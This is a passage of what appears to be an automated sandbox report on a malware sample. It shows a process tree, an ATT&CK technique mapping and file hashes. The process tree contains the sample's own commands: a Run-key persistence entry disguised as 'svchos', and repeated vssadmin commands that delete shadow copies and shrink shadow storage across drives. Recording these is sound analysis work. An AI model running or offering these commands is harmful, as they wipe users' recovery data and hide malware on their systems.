    3⤵
    PID:5364
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\eiavW.exe" /f
  2⤵
  PID:5824
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\eiavW.exe" /f
    3⤵
    - Adds Run key to start application
    PID:5272

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 1d831e04340e824dea5b6a494d1269f5 oRS/vaFIME6Gv9S97MFEtA.0.1.0.0.0
1⤵
PID:2192
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:400

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3428

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2124

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5236

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5884

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5436

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1328

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:16480
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:16976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:10568
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:10624
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:10680
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:10828
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:10896
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    PID:10956
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    PID:17544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:20556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:20608
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:20680
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:20800
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:20828
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:20868
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    PID:20896
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:21012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:28092
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:28148
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:28184
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    PID:28212
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:28240
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:28268
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:28296
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:28344
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:28532
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    PID:28640
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    PID:22404
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    PID:17632
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:17784
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:17880
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:11236

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:16544

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:25636

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:26096

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:26424

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:26836

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:27152

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:27324

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:10380

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:17424

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:20904

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:22032

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:27732

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:28380

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:22300

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:17684

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:17936

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:28928

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:29344

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:29672

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:29956

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:30124

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:6756

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:11592

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:11944

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:12340

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:12664

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:14068

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:22912

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:23124

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:7172

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:7500

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:7656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.chm

Filesize
112KB

MD5
4fe42eb4ec9840fe378ac1f4206743bf

SHA1
e9bf44aee0c8471109b38b92e3a735b9cc23b740

SHA256
f76f4458fbaa75e06624ec9533373cb455b1f57bf0b1424d7d5555e232f5edd3

SHA512
1425a8eb19b640fbe857140fe2617ab9b980ff8d9368831b585d01bd6d10a261de7a30071cc83249487146e39c7bc67c8d1a6432939634bfacf9aaacabe2d586

Download Submit
C:\Program Files\7-Zip\7z.sfx

Filesize
209KB

MD5
5342eecaf9d646e429a8134f5e7a0597

SHA1
86903f1e4dbab2258342f29ff652831245090896

SHA256
9b8c22a676e2984679d58b65368ea225581563b23c2e374824bbd57a249a5297

SHA512
65045b57a5dabc7e631bac434091c4571d3d4d37b5ee7e80b0c89acc4f64fa3d20040b4917a2f75c9f8adfbb50ec57fee2ea9c96c732fe7a84d970d72b605dcb

Download Submit
C:\Program Files\7-Zip\7zCon.sfx

Filesize
188KB

MD5
f0e963e90e766a0f24833520c135ebce

SHA1
d1b634eadc60e8a184348d53c8e7a8ddc8aa6dbb

SHA256
e816d3a08f07b2710fb0d51f085d17de68b7130cb285fd21f6ea93c86690ab37

SHA512
4c1de4d179ceddadc8b249b0243af8ff752e293dc54a2eb641774722dfdb37574c2c978eb4025226045d7df4114d27ef7237d9a9673d1caf15d71284d842d97a

Download Submit
C:\Program Files\7-Zip\History.txt

Filesize
57KB

MD5
e9a5af187947424146b4ecd06dbb388b

SHA1
9abf48fa37794d5054d1690adad59119edf0530e

SHA256
dada081b4db9340c5f5f22c1ca8b82305da80181a43ef0f4df3d6ecbdf5647fa

SHA512
db8482f890ae2c900d1e4c3625166ff618ef48d869004d108f42928fa5369bbd296307c23ac4bd443167ce4c2f6b4effbe975b28dc6a9f677c0524ed04f9ac5f

Download Submit
C:\Program Files\7-Zip\Lang\af.txt

Filesize
5KB

MD5
0eb2ffed7791cc8a671aab3ff8bba438

SHA1
f699fd96d29b5a651a8cf28a5d547ab059ebc917

SHA256
ae260c8467bd7c3f7cb6b5fa00007da208bfcac466998a14b25154aae1d6768b

SHA512
fc53bd82ccabca0bf84178e2c9b7fdcfe59b75a735ca712281d09f87bf4f9cef0603bc1b00cc0abbc1821d790031486753f33c397a6d8183dbbd6dd1d7f14071

Download Submit
C:\Program Files\7-Zip\Lang\an.txt

Filesize
7KB

MD5
ccda660b4ca625e7621dac5c548e781f

SHA1
ecd67ff5b6302758b1fb8d434877551096a52f21

SHA256
4ec034bab3aba4359bb22fd35b5366b8ff23cda9cb54d3030cf84b1528ea8aaa

SHA512
6c6c464b714cf2ee1f1da7e7c52a3d0b5a9cce6449f68294b7f9ff5ba9e2fbe98d0df3aec8b90dc4e827eba8c9e2c9fb10a6f46c1094222647aae94223ca3225

Download Submit
C:\Program Files\7-Zip\descript.ion

Filesize
642B

MD5
d136304919da9e68a68a7f6b67a434ef

SHA1
255bfe40ec621829481a6f194b2fdddf93582d46

SHA256
18ed0d6b10220987a1ff50eb12ea9acbfedb658652ea340cdab36666a303e8e3

SHA512
3456acbe3d59b92e8bed7ad5d61be3c889e640157e869c926b5219a359c4e209d32c5209025cc780d9b2cde515333093570e8e71943d6a74d42331a03469a98c

Download Submit
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi

Filesize
2.7MB

MD5
ad5662e5baa6f1c6f515ab09a053317f

SHA1
4f2fbbfae0c80178222dfedf76a307feb37292f6

SHA256
21c6de41faf5b3c4d0b0c10d83280dc7afb98415a2eba009876f107607d63071

SHA512
9bcf8fe2fff072b1e1d0dfda7319ad47856eee9d75b0403d1ce42848ce6106eb9c42e10ef0c3fe21d0153e7d5830af47cc30d64bc5fda1316fc08c7aef1a6043

Download Submit
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.0.xml

Filesize
2KB

MD5
c741798d51414c35ac3315b6929cf6d9

SHA1
ed5d6ff6c2bc5194361e9f3a89c02cf055f96cfa

SHA256
0b15da6281b3d3e8f9670425046ef8e37cb8e7e464b1572a7e3dc73ac10bc7d9

SHA512
825c3a7057b667e3bb842cde2a65e9cd49eed93a7bce5c111d3f7a6c480e6d00e349e750027ab6474b8a545fc5daeb253a0ad677dd3997e084fd0210053542ed

Download Submit
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.2.xml

Filesize
1KB

MD5
41e71abad013b75cb79e11369ea7963a

SHA1
e43838bdff712e277862f8c2985e7a6b1d70db60

SHA256
8940c78213e8874e8289fcbfeb6c13c9b525b7e5b19c360256ce64b48c9495ef

SHA512
18829bb04126a718da1323f0c34a0a53e2b8d700e11ce1ebc53a54bc4fd229b192748134107b98ec86f216a6f03a0ecc2d89de97ee9e6bdefed804764e04c20d

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\DeploymentConfiguration.xml

Filesize
898B

MD5
26a65336fa2a8ae6209fcd7eeae01274

SHA1
74d6484abd8043d8504ed99d3bd23755fb1f8d81

SHA256
813b10667924787da0ad700ab1dd1874183425011978a19ee387a40e8a7eb66d

SHA512
f2a27358e7da05f77b65a53501fc6738420f12381e8c17c6e73361f9be2f66c2fd1da29a503f4f9b8cfe31f5a17698a33c843f74223422ac50ce697fccb59ed8

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml

Filesize
3.3MB

MD5
4dfc6534587f8f7f5ba247ff77764986

SHA1
6c7f8cfdbb49de31d3375f73bdbd10d15331feeb

SHA256
20b1988f581b23795675adba38e43b651689dfda9225fca26c8b877f98b97f68

SHA512
221667fdff795a8424a22ac07c20c266a40b57aa16fafcae4efe3301cdeabece90e5cf1355a4b3bff9d48e2861a442bb97cd5ca1e5ffc157e33e7163d02fed94

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserDeploymentConfiguration.xml

Filesize
898B

MD5
61bb67cf466e968db0ca319e339e512f

SHA1
f1e271a15bbaca8f596e6a10a7c790777f3c1947

SHA256
6f13c36b650792ed35d6d63f73c235c5f3fe047478a78474e3366449e9e17e29

SHA512
07ce474abc3c6c491e34e9e04eee6d7967c4763c895e10748a7470256a7829b7e7d84b48aabef260f808f00906b54523addf610e5c86c24d02807283c1b4b86b

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserManifest.xml

Filesize
2.1MB

MD5
c55bd60efc68d2b892b2aa2e097c2a6b

SHA1
a01ab7d0ce7f410253a8b570fdf0419fc3a6e994

SHA256
029ef221caa75c1210cc77a4a1463ccb848e75212da37daaaa02babca8ae1eba

SHA512
ca7963b6193eca8f25782f66e6c920944338fb6438126dc116bfa8d89d8a619d38e086e553259fc0a42d4d31febf80b09d83099b5b7b66029cc12edd6f9fe927

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\en-us.16\MasterDescriptor.en-us.xml

Filesize
28KB

MD5
415ea9659e298a809337dc6ea861ad33

SHA1
8c211d431fae179a4119467316cf295a58d2ec5e

SHA256
89a1b5bedb024b12e1785081d6f679fd4b360e34e684cc806da447d09260c52f

SHA512
f3470740fd995bee016536b949b1e533e224cca21dbeb0178f3292ebb49767c97c259a2abf579827d9fb9479c03239fbbb8ff2da0c84d6e23aa59bdb44fcd946

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\en-us.16\s641033.hash

Filesize
386B

MD5
6e0765b66d4019639cd05367d5b0cb37

SHA1
56ade78eb9f0773b22abd86ece5264b464d50246

SHA256
21536f0752012d7165526cf2a2d67256add35326faee7c2bc078a39a035ea949

SHA512
4814d72c601815945f6a402ee63b4724d9ab5db9e97aec617e3aeef136296a4e7395f71661b4b98fd92828fe1ad856e844d05982dfd4230a3beea3434d453922

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\en-us.16\stream.x64.en-us.dat.cat

Filesize
109KB

MD5
06b69abe5baff3082d4969dad9e5c602

SHA1
6ccb0d0b532d7af57cbb0228da04aa0224ac8902

SHA256
1299edb937a6dbbcbdf92c2c66a7fbce1391a9d9e9c39d945fb7a189fb0bdba6

SHA512
dd59a266a0a31e8b71601664cf0b53f833e4011f6ee5d56c1877fdaf131f4356aa1ad1ac6c5a21a9b62d021244c8f92efa618b4d9bc2c3ac9d7319c33d2da732

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\en-us.16\stream.x64.en-us.db

Filesize
438KB

MD5
0efad6a49bbd7651031c2a45b2fef3a3

SHA1
c9f6eaa469f462a95d168afe31759017c91484f1

SHA256
2342e3d4bc01956841d2c14558173a1054da74ed24cdcd68e79bd20bd1785457

SHA512
f97f05a63329d1a70bf66360cc63a1b103f8004b0d55e9799fa4f9c2e6d18666ed8c9de2ebdec6bb1abc060bbca4920771c4ce083aa00b0b7c9d6310d0df81e7

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\en-us.16\stream.x64.en-us.hash

Filesize
418B

MD5
adb92ffc12e049911816bdbcfdb5baa3

SHA1
ea163485cafa1a528ab22162fe7758ecf0c654b5

SHA256
ae762a3554e04949f5975c29833807d29d01f9bbd2999977dd89cd0d0251ed63

SHA512
10a07ea75fb6fb3a2dd61a4bf8fd8df595a6ae9e6a92c7631c20d6ac8c16115ed294b2bd46f892b5115169e81c77470194ca678e915b7d8da0e32f2f04aa36e1

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\en-us.16\stream.x64.en-us.man.dat

Filesize
622KB

MD5
bc1a6fd861906bf14e5b47b53e58e8a2

SHA1
bf36aa455c101deded14f50b35cbe75ed5a5ed52

SHA256
8866ceb3ee30fcf198c45ad2ee740bc1a34db4e9aeb796375164ecf35186f581

SHA512
a47d32109200e4fd2723fb95fae21154f106251847b29c340099f3bf76925a06698f7076a57128524bc7800d6b0660193008a1618bfe5dbf5c5ec0321fdbabe4

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\mergedVirtualRegistry.dat

Filesize
5.9MB

MD5
83723065daac65701ce2b36cb141a2a7

SHA1
95335f630238a868e52565f1f8011810f4f6ba30

SHA256
0633d6a0776f799bf48b9a5c159a4bed5d9b3f30c058d391e015397ddde8ff83

SHA512
562b2d5a6a2a4834e8d97cc741b75a3ca875bf0c2e986fa6a633a897eb10697353ddd2e8b8b432d968994ed8cef0d94f6059a7371f9b2be94924cd61cd8a1144

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\x-none.16\MasterDescriptor.x-none.xml

Filesize
27KB

MD5
f15e67790723481a07f8197989d170c0

SHA1
c5e376d01f162b52636ca43a3b03994228b5ae70

SHA256
ad950feb60062424f7045e2a52f6de66bc2e1521772b8b2dab7ee9709951ab3a

SHA512
5398fbc69495e9824682b9aa61ee39ff43ab919e45c32b5d3e7e8824e6626a672618421b9a505ef1b0dface43393093500f6f483d207b96c444257573e4a6c17

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\x-none.16\s640.hash

Filesize
386B

MD5
a68cae7461f222e8ded4d642bc45e796

SHA1
45c38f4d76afb3be953b081ea5f5c1edb0b05e24

SHA256
b3c8d60fdb7647fb3f828f73004095dc5e0a2b26e4028043abd279c53a7ce807

SHA512
71d50f41f4a0ec2611a1397e4369db176603a65a61e1fdf5e66312e4990daa62cd133187f052a894aada0e1d1fc9649b22d116f1317840032f343a91bd26ffef

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\x-none.16\stream.x64.x-none.dat.cat

Filesize
574KB

MD5
ba0d0a33ad6f2a62da217f5d4d5ea17c

SHA1
7260354bc0ba8b418b4d556d62be59d2d9fb27aa

SHA256
411a682117a9a952204606a89710c8aab465b045179fa4e80338ba1aa3fb8dc8

SHA512
9dd54d048fee1f13e25996f3857f309416c2508f491a361a25d7153232de85590e5e11e6137abdcdc564e38896b16dde7fad42b7f048a748fb05313a7f4a928b

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\x-none.16\stream.x64.x-none.db

Filesize
1.8MB

MD5
de573457571b5c8e0396e718ace44466

SHA1
3daecff59acc1c5a9d6397318f196bfa75c222e6

SHA256
9bace58fdb1cb0f0bdcf01c7b017002df1feb458a4a1837e3bde965842cccd25

SHA512
7ac78c192f14463d5cbabf8652ae16eed76f7f39f2e7b4b4d1db1ed9ee4f563f7b2cd84245f8b9002ef78c3959cf4cd710c63ab939305b8371c62bd958581752

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\x-none.16\stream.x64.x-none.hash

Filesize
418B

MD5
f61fb4ff9c4852c0f72d7108f8e56568

SHA1
bdaaef2ac67f3be13bccf1fa0468251ce08e4e6b

SHA256
08936e7e136a870ac25c95b4cdcb0b064356ed512001b513751761bdf9c74efd

SHA512
7a0f1ff7adc4bd7de6403e5742c8f65daa7cb7cb1fac6f58f9adaf3e41e271cebbeed9e10dbb40dff07615c211177d17a00972ae5a77222e52af0b2080019da7

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\77B4AF16-76DD-4A4D-9972-C3F29D9E4924\x-none.16\stream.x64.x-none.man.dat

Filesize
2.6MB

MD5
7a689c0a300c3cd370835fe502fc4e22

SHA1
012f800528273e3085e228a8aea1b7d49ee9dd21

SHA256
